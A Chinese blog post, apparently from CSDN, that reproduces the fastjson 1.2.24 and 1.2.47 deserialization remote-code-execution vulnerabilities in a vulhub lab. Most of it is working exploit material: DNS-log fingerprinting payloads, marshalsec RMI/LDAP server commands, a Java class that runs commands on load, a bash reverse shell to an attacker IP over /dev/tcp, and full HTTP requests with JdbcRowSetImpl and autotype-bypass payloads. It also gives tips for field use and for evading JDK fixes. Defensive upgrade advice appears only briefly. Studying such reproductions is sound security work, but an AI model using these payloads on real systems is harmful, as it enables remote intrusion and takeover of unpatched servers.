fastjson反序列化漏洞

最新推荐文章于 2024-08-31 06:45:00 发布
最新推荐文章于 2024-08-31 06:45:00 发布
阅读量9.3k 收藏 58
点赞数 6
分类专栏: # 漏洞复现 文章标签: fastjson 反序列化 fastjson反序列化 反序列化漏洞
学习之路长且漫,长情与君总会见!
本文链接:https://blog.csdn.net/Aaron_Miller/article/details/106538764
版权

文章目录


在这里插入图片描述

一、fastjson 1.2.24反序列化漏洞

1.1 漏洞简介

1.1.1 漏洞阐述

  FastJson是alibaba开源的一款开源的高性能的JSON库,用于将java对象转换为json形式,也可以用来将json转换为java对象,很多公司都在使用,于2017年4月18号爆出存在此漏洞。

  • https://github.com/alibaba/fastjson
1.1.2 影响版本
  • FastJson < 1.2.24
1.1.3 漏洞原理

  fastjson在解析json过程中,支持使用autoType来实例化某一个具体的类,并通过json来填充其属性值。而JDK自带的类com.sun.org.apache.xalan.internal.xsltc.trax.Templateslmpl中有一个私有属性 _bytecodes,其部分方法会执行这个值中包含的Java字节码。

1.1.4 指纹特征
A. 有回显

通过构造错误的POST请求体,服务器返回报错中查看是否存在fastjson字样

正常请求如下,是get的请求且没有请求体,我们通过构造错误的POST请求即可查看返回包中有解析失败,fastjson字样:
在这里插入图片描述

B. 无回显

(方法一:通过DOS延迟方式)

fastjson在版本<1.2.60在取不到值的时候会填充\u001a,发生DOS,我们可以构造请求,通过响应延迟来判断是否使用的fastjson

》》无构造的正常请求返回时间,28ms(这里Fiddler演示,Burp可以通过Repeater模块右下方观察)
在这里插入图片描述
》》构造错误的POST请求体返回时间,15ms(可见随意的错误请求不奏效)
在这里插入图片描述
在这里插入图片描述
》》通过 {“a”:"\x 触发DOS,585ms,和正常的和错误的请求响应时间差太多,由此来判断使用了fastjson解析器
在这里插入图片描述
在这里插入图片描述

(方法二:通过DNS回显方式)

通过DNS回显的方式检测后端是否使用的fastjson

{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
Set[{"@type":"java.net.URL","val":"dnslog"}]
Set[{"@type":"java.net.URL","val":"dnslog"}
{{"@type":"java.net.URL","val":"dnslog"}:0
C. 小技巧

如何判断使用的Fastjson还是Jackson?
Jackson相对比较严格,强制key和javabean属性对齐,只能少不能多key

》》fastjson多key不会报错,我们可以多构造一个,因此大概率判断为fastjson(没有其它json解析库的情况下)
在这里插入图片描述

1.1.5 限制条件

  要想使用Templateslmpl的_bytecodes属性执行任意命令,条件:

  1. 站点使用fastjson库解析json
  2. 解析时设置了Feature.SupoortNonPublicField(否则不支持传入私有属性)
  3. 目标jdk中存在Templateslmpl类(不排除其它不需要Templateslmpl的利用方法)

1.2 环境搭建

  • 受害者IP:192.168.159.129(vulhub、docker)
  • 攻击者IP:192.168.123.192(marshalsec、nc、web服务)

》》在如下目录下启动靶机
在这里插入图片描述
》》拉起靶机环境
在这里插入图片描述
》》查看端口服务
在这里插入图片描述
》》浏览器访问目的地址(如下搭建成功)
在这里插入图片描述

1.3 漏洞利用

1.3.1 利用准备
A. RMI/LDAP服务器准备

Tips:实战环境中建议使用LDAP协议

》》下载marshalsec项目

git clone https://github.com/mbechler/marshalsec.git

》》安装配置mvn(略)
》》进入marshalsec目录,使用mvn编译msrshalsec的jar包
在这里插入图片描述
(编译完成)
在这里插入图片描述
(编译完成生成的文件)
在这里插入图片描述

B. POC/EXP编译构造

》》IDEA中新建一个项目
在这里插入图片描述
》》选择java项目
在这里插入图片描述
》》点击下一步
》》创建项目名称和位置
在这里插入图片描述
》》项目目录下创建一个文件夹,命名src
》》src目录下新建一个java文件(根据exp操作命名,这里是TouchFile[目的是目标主机上创建一个文件])
在这里插入图片描述
》》TouchFile类如下:(commands中存放执行的命令)

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

在这里插入图片描述
(编译生成class文件,方法一)
》》使用javac将java文件编译成class文件
在这里插入图片描述
(编译生成class文件,方法二)
》》项目目录下再次创建output目录(存放编译生成的class文件)
在这里插入图片描述
》》设置编译路径
在这里插入图片描述
在这里插入图片描述
》》运行编译TouchFile文件
在这里插入图片描述
在这里插入图片描述
》》便会在output中生成class文件
在这里插入图片描述

C Web服务器准备

》》启动一个web服务,将恶意的class文件放入站点的主目录(www目录,这里使用的phpstudy创建的web服务)

1.3.2 漏洞利用一(执行命令)

》》打开命令行窗口:使用marshalsec项目,启动一个RMI服务器,监听9999端口并定制加载远程类)

Tips:实战环境中建议使用LDAP协议

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.123.192/#Exploit" 9999

(已经开始监听9999端口)
在这里插入图片描述

注意上边的#

  • 攻击请求包构造 / 发送攻击载荷(方式一)
    》》抓取GET请求数据包,将GET请求通过Fiddler(其它抓包工具也可以)改为POST请求,并在请求体中添加如下json数据,dataSourceName的值中指定rmi服务器的地址
    在这里插入图片描述
{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.123.192:9999/TouchFile",
        "autoCommit":true
    }
}

(HTTP状态码返回 500)
在这里插入图片描述

Tips:
如果没成功可以尝试在请求头中指定MIME类型为json:
Content-Type: application/json

流量攻击流程:
请求数据包将请求体中的json数据传给受害服务器,受害服务器会将请求重定向到攻击者的RMI服务器,RMI服务器从监听的9999端口中加载远程类TouchFile并重定向到web服务器,fastjson将下载TouchFile,解析运行。

  • 攻击请求包构造 / 发送攻击载荷(方式二)
    》》直接向服务器发送构造的如下数据
POST / HTTP/1.1
Host: 192.168.159.129:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.123.192:9999/TouchFile",
        "autoCommit":true
    }
}

Tips:注意修改上边的HOST地址和rmi地址

》》可以看到RMI服务器成功传值到受害者服务器
在这里插入图片描述
》》成功在受害者服务器中执行命令
在这里插入图片描述

1.3.3 漏洞利用二(反弹shell)

》》编译生成的class java文件的类如下(exec中为反弹连接的shell地址):

public class Exploit {
    public Exploit(){
        try{
            Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.123.192/19111 0>&1");
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        Exploit e = new Exploit();
    }
}

Tips:这里反弹shell的端口尽量不要指定8888、8080等常用web端口

在这里插入图片描述
》》将编译生成的Exploit.class文件放入web服务器主目录
》》事先准备好两个命令行窗口
》》窗口一:nc监听19111端口
在这里插入图片描述
》》窗口二:启动RMI服务监听9999端口
在这里插入图片描述
》》构造并发送数据包到目标服务器

POST / HTTP/1.1
Host: 192.168.159.129:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.123.192:9999/Exploit",
        "autoCommit":true
    }
}

》》成功接到shell
在这里插入图片描述

1.4 防御建议

  • 将fastjson升级到最新版本
  • 升级JDK版本到 11.0.1 / 6u211 / 7u201 / 8u191

官方补丁中将loadClass替换为了config.checkAutoType(typeName),并且扩充了黑名单列表,将传入的类名和黑名单中一一比较,如果发现了相同的开头就停止反序列化。

二、fastjson 1.2.47反序列化漏洞

2.1 漏洞简介

  fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type"指定反序列化的类型。其次,fastjson自定义的反序列化机制时会调用指定类中的setter方法和部分getter方法。因此,当组件开启了autotype功能并且反序列化不可信数据时,便可构造恶意序列化的数据,使代码执行流程进入特定类的特定setter或者getter方法中,如果指定类的指定方法中有可以被利用的逻辑(通常说的“Gadget”)则会造成安全问题。fastjson 1.2.47以下版本中,利用缓存机制可以对未开启autotype功能绕过。

2.2 影响版本

  • fastjson < 1.2.47

2.3 环境搭建

攻击者:192.168.1.101(win10)
受害者:192.168.159.129(vulhub、docker)

》》进入环境目录,docker拉起环境
在这里插入图片描述
》》浏览器访问目标端口
在这里插入图片描述

2.4 攻击过程

》》启动一个web服务器,将编译的class类文件放入主目录下(TouchFile.class)

》》marshalsec启动一个RMI/LDAP服务,监听9999端口,并加载远程类TouchFile

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.1.101/#TouchFile" 9999

在这里插入图片描述
》》向目标服务器发送构造的攻击载荷
在这里插入图片描述

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.1.101:9999/TouchFile",
        "autoCommit":true
    }
}

》》成功执行命令
在这里插入图片描述
在这里插入图片描述

三、注意事项

  1. 尽量使用和目标服务器相同的jdk版本
  • 攻击者环境:Java 8u201
    在这里插入图片描述
  • 受害者环境:Java 8u102
    在这里插入图片描述

  1. 当运行RMI的服务器Java版本过高会无法运行RMI服务,虽然显示在监听,但是fastjson的 JNDI会报错,显示无法获取到资源。

  2. 优先使用LDAP协议
    实战中优先使用LDAP协议进行漏洞利用,原因是:
    RMI协议利用方式在JDK 6u132 / 7u122 / 8u113及以上版本中已修复
    LDAP协议利用方式在JDK 6u211 / 7u201 / 8u191及以上版本中已修复
    且LDAP可以直接返回序列化对象,绕过对方使用的更高版本的JDK限制。

    (RMI和LDAP两种服务协议启动方式)
    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://192.168.1.101/#TouchFile” <port>

    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer “http://IP/#Exploit” <port>

  3. 高版本JDK绕过方法
    https://www.freebuf.com/column/207439.html

参考文章:
https://blog.csdn.net/w1590191166/article/details/105016535
https://github.com/CaijiOrz/fastjson-1.2.47-RCE
https://cloud.tencent.com/developer/article/1553664

Fastjson反序列化漏洞
blackmagic的博客
08-09 1474
使用恶意MySQL的url作为参数创建一个com.mysql.cj.jdbc.admin.MiniAdmin对象可以通过MySQL的JDBC驱动的com.mysql.cj.jdbc.admin.MiniAdmin类创建一个指定url的JDBC连接。再通过LOAD DATA LOCAL INFILE语句读取任意文件。只要用户期望类继承自 Throwable 类,Fastjson便会将该类信任,从而造成只要是继承Throwable的任意类都可以被反序列化。生成恶意mysql文件后,
【渗透测试】Fastjson 反序列化漏洞原理(一)
最新发布
SunnyCat
03-24 1063
反序列化漏洞是指攻击者通过构造恶意的 JSON 数据,使得反序列化过程执行了未经授权的代码。这通常发生在应用程序接受外部输入并将其反序列化为对象时,如果输入的数据格式不符合预期,或者应用程序没有适当地验证和过滤输入,攻击者可以注入恶意代码并执行。
Fastjson 反序列化漏洞
Cover-3321的博客
01-09 6050
fastjson在解析json(反序列化)的过程中,支持使用@Type来实例化一个具体类,且自动调用这个类的set/get方法来访问属性。黑客通过查找代码中的get方法,来远程加载恶意命令,即造成反序列化漏洞
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub靶场)
人若无名,便可专心练剑
03-27 5454
Fastjson反序列化漏洞也是一个知名度比较高的Java反序列化漏洞,他是阿里巴巴的开源库,下面我将主要带大家了解Fastjson反序列化漏洞的原理以及相关知识点的内容,然后带师傅们去利用rmi服务去复现这个Fastjson反序列化漏洞!!!
Fastjson反序列化漏洞:深入探讨与安全防范
xycxycooo的博客
08-31 1799
通过本文的讲解,我们详细了解了Fastjson反序列化漏洞的原理、影响以及如何进行安全防范。Fastjson反序列化漏洞主要是由于Fastjson反序列化过程中,对输入数据的安全性验证不足,导致攻击者可以构造恶意JSON数据,触发反序列化操作,进而执行任意代码或命令。为了避免这类漏洞,可以采取升级Fastjson版本、禁用@type自动类型解析、使用白名单机制和输入验证等安全防范措施。希望本文能够帮助你更好地理解和应用Fastjson反序列化漏洞的安全防范。如果你有任何问题或需要进一步的解释,请随时提问。
FastJson反序列化漏洞(实验文章)
soldi_er的博客
11-25 745
文章目录Json数据格式FastJson类库Json的三个类库下载Jar压缩包Autotype功能参考 Json数据格式 JSON是一种轻量级的数据交换格式,全称:JavaScript 对象表示法(JavaScript Object Notation) 类比XML,你可以把JSON看作是一种存储数据的格式类型,一种数据规范。描述JSON格式数据的语法只是采用了JS对象字面量的表示方法,它独立于语言存在,只是在不同的编程语言中对这种数据类型的实现不同。 FastJson类库 Json的三个类库 Java处理J
科普文:Java基础系列之【字节码应用案例Fastjson反序列化漏洞
为无为,事无事,味无味。
08-11 1200
transform方法利用Java的反射机制进行函数调用,传入的参数是input是一个实例化对象,利用这个方法便可以调用任意对象的任意方法(exec)从而执行命令,所以在DeSertPoc类里新建Transformer,最后组成的核心表达式为:((Runtime)Runtime.class.getMethod("getRuntime",null).invoke(null,null)).exec("whoami");基于TemplateImpl的方法可以直接执行bytecodes。
fastjson反序列化漏洞(CVE-2017-18349)
网络空间安全学习
09-19 778
fastjson中,在反序列化的时候 jdk中 的 jdbcRowSetImpl 类一定会被执行,我们给此类中的 setDataSourcesName 输入恶意内容(rmi链接),让目标服务在反序列化的时候,请求rmi服务器,执行rmi服务器下发的命令,从而导致远程命令执行漏洞。它没有用java的序列化机制,而是自定义了一套序列化机制。"JSON.toJSONString"是Java语言中com.alibaba.fastjson.JSON类提供的一个方法,用于将Java对象转换为JSON格式的字符串。
深入理解FastJson反序列化漏洞利用
知识点三:FastJson反序列化漏洞具体利用方法 FastJson在处理某些特定输入数据时,可能会不安全地执行Java代码。具体来说,漏洞通常是由于FastJson在解析JSON数据时会查找并调用类路径中的特定方法,例如setter方法...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

風月长情

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值